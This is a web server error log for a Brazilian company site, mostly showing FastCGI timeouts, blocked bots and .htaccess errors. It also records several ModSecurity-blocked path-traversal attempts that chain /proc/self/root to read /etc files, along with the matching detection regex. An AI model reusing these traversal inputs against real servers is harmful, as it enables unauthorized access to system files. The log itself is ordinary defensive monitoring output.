[Wed Mar 18 23:40:19.302778 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50378] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:40:46.693993 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50502] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:41:08.121209 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50708] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:41:30.093881 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50836] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:41:38.284806 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.244.43:55696] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtiYta6ubjKNq_cu4bhkwAAA0Y"]
[Wed Mar 18 23:41:38.963648 2026] [access_compat:error] [pid 26799:tid 140411658000128] [client 80.97.160.132:46742] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/about.php, referer: http://bandeirantesbombas.com.br/wp-content/uploads/about.php
[Wed Mar 18 23:41:42.435644 2026] [access_compat:error] [pid 17653:tid 140411741927168] [client 80.97.160.132:46954] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/pages.php, referer: http://bandeirantesbombas.com.br/wp-content/uploads/pages.php
[Wed Mar 18 23:41:54.354638 2026] [proxy_fcgi:error] [pid 9800:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51008] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:42:32.857932 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51104] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:43:13.707229 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51178] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:43:45.777926 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51342] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:44:07.029815 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51438] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:44:57.645807 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51486] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:46:08.241792 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:46:36.153883 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51670] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:46:57.125898 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:47:25.361909 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:47:47.157867 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51954] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:47:56.432836 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.244.43:51632] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtj3Ow_le52K8_3pV0hwQAAAhU"]
[Wed Mar 18 23:48:08.065990 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52078] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:48:45.893810 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52108] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:49:40.737857 2026] [proxy_fcgi:error] [pid 9530:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:50:07.553831 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52360] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:51:09.519309 2026] [:error] [pid 23798:tid 140411674785536] [client 74.7.228.61:50238] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtknT-9rzzdA3Ti0NCZCQAAAYg"]
[Wed Mar 18 23:51:37.625819 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:52:25.481572 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:52:54.570676 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.244.43:50388] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtlBimAPhZkrhU8w4mwpwAAAJA"]
[Wed Mar 18 23:52:56.286232 2026] [proxy_fcgi:error] [pid 23798:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52636] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:53:18.057841 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53170] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:53:39.045856 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53246] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:54:11.352729 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53324] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:54:57.281934 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53412] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:55:23.629828 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53646] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:56:06.765871 2026] [proxy_fcgi:error] [pid 9530:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53750] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:56:28.045869 2026] [proxy_fcgi:error] [pid 23798:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54042] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:56:39.451502 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.228.61:39012] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtl58df6f5d65gmYZQb3gAAAtY"]
[Wed Mar 18 23:56:49.149823 2026] [proxy_fcgi:error] [pid 29882:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54178] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:57:24.413851 2026] [proxy_fcgi:error] [pid 9333:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54264] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:57:52.125952 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54428] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:58:13.073192 2026] [proxy_fcgi:error] [pid 9333:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54950] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:58:34.069915 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55108] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:58:55.133806 2026] [proxy_fcgi:error] [pid 29882:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55286] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:59:10.754894 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.244.43:53286] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtmfuoXxyEfFpUF8f-8UQAAAVg"]
[Wed Mar 18 23:59:16.125969 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55500] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:59:37.133797 2026] [proxy_fcgi:error] [pid 9333:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55782] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:59:47.696596 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:55072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtmoymAPhZkrhU8w4mw9wAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 23:59:58.129857 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:00:20.985824 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:00:42.137805 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:00:53.833429 2026] [core:alert] [pid 11816:tid 140411599251200] [client 57.141.18.73:56500] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:00:53.833936 2026] [core:alert] [pid 15826:tid 140411733534464] [client 57.141.18.89:56562] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:01:05.309960 2026] [proxy_fcgi:error] [pid 15051:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57194] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:01:30.130599 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57684] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:01:41.803444 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.228.61:57898] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtnFQkwaGbbGflqUZBaIAAAAMU"]
[Thu Mar 19 00:01:56.119406 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 57.141.18.87:53240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:02:00.086161 2026] [proxy_fcgi:error] [pid 23798:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:03:22.357432 2026] [mime_magic:error] [pid 15051:tid 140411666392832] (70014)End of file found: [client 57.141.18.105:58926] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:03:34.101890 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58700] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:04:22.151396 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.244.43:43022] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtntuw_le52K8_3pV0iVgAAAgw"]
[Thu Mar 19 00:04:28.821998 2026] [proxy_fcgi:error] [pid 9530:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:04:50.137928 2026] [proxy_fcgi:error] [pid 9333:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60504] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:05:00.969373 2026] [mime_magic:error] [pid 17887:tid 140411607643904] (70014)End of file found: [client 57.141.18.13:60510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:05:11.234018 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:05:35.130711 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:32948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:05:56.185901 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:06:01.039229 2026] [mime_magic:error] [pid 27403:tid 140411632822016] (70014)End of file found: [client 57.141.18.48:33304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:06:09.256050 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:53350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtoIQbLMZ6AikZjR9UGRwAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:06:17.143019 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:06:28.120045 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 57.141.18.11:33854] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:06:30.429651 2026] [core:alert] [pid 23798:tid 140411708356352] [client 57.141.18.100:33870] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:06:38.146618 2026] [proxy_fcgi:error] [pid 9800:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33928] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:06:58.090270 2026] [:error] [pid 9333:tid 140411733534464] [client 74.7.228.61:51256] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtoUg_eYRmh974Uj6QKtAAAAoE"]
[Thu Mar 19 00:06:59.129980 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:07:03.119823 2026] [core:alert] [pid 30077:tid 140411565680384] [client 57.141.18.73:34398] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:07:20.150392 2026] [proxy_fcgi:error] [pid 9800:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34596] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:07:41.141915 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:08:03.042060 2026] [proxy_fcgi:error] [pid 23798:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:08:27.145779 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:08:33.559692 2026] [mime_magic:error] [pid 9800:tid 140411699963648] (70014)End of file found: [client 57.141.18.18:35994] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:08:39.559232 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:57446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtot_u8EFLIOrSqIptGEQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:08:51.032877 2026] [mime_magic:error] [pid 14269:tid 140411590858496] (70014)End of file found: [client 57.141.18.114:36318] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:08:53.153799 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:09:13.267190 2026] [:error] [pid 23798:tid 140411666392832] [client 74.7.243.128:40060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abto2T-9rzzdA3Ti0NCaJgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:09:22.149794 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36508] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:09:24.422703 2026] [core:alert] [pid 14269:tid 140411599251200] [client 57.141.18.17:36970] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:09:26.130540 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.244.43:53218] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abto5gbLMZ6AikZjR9UGhAAAAA8"]
[Thu Mar 19 00:09:32.266776 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:46560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abto7CmAPhZkrhU8w4mxjAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:10:09.125896 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37278] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:10:44.128035 2026] [proxy_fcgi:error] [pid 9800:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37970] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:11:13.073822 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:11:35.137802 2026] [proxy_fcgi:error] [pid 9800:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:11:56.125912 2026] [proxy_fcgi:error] [pid 9333:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:12:00.539253 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.228.61:50020] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtpgBkFeYa1D6dYQnCUNQAAAc4"]
[Thu Mar 19 00:12:18.099330 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:12:19.711014 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:39758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpk-w_le52K8_3pV0i5wAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
